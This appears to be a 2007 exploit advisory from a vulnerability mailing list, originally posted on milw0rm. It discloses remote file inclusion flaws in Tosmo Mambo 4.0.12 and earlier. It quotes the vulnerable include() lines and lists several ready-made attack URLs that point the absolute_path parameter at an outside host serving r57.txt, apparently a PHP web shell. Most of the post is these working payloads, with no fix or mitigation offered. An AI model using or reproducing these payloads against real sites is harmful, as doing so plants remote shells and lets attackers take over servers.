Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

CreaDirectory v1.2 Remote SQL Injection Vulnerability

osp <= 1.2.1 (cfgPathToProject Admin) Remote File Include Vulnerablities

AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities

StoreFront for Gallery (GALLERY_BASEDIR) Remote File Inclusion Vulnerabilities

From:	Cold Zero <c.o.1.d.0_(at)_hotmail.com>
Date:	19.04.2007
Subject:	Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities

=======================================================
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x&i=tosm
o_mambo.zip
==============================================
File : /components/com_minibb.php
include("$absolute_path/components/minibb/bb_admin.php");
======
/components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt?

========================================================

File : /components/minibb/bb_plugins.php

<?php
include ($absolute_path.'/components/minibb/hack_smilies.php');
?>
======
/components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================

File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
include_once("$absolute_path/version.php");
======
/configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================
#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]